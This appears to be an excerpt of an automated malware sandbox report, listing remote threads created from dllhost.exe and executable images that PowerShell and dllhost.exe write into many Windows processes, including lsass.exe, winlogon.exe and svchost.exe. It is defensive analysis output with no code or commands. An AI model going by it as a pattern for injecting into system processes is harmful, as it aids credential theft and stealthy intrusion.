Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F2BD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C07B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C9A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7DEB2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6EDC2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F2BD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7CE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29792EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35282EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 47802EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C07B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D7CE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A8152EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 47802EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 92FE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 93102EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: C05B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FFD52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1B952EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 35E72EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F18C2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1912EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: 7EAE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E8752EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8B32EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F3052EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B212EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B212EBC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 263841B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFCF40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1495FCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E120000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACF3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29BB2810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 297E6E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29BB2810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: A20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 8B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 690000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\jZhbodZkDqhDQAbcEVXHsEGHQntjYuUiYQlUfYfGsaZXshWTyfUVmlsajZdPJSrHXBcRWSlSmiIsuew\PVineiOIWkglyqRRxYWKRbFJwgofur.exe base: B10000 value starts with: 4D5A
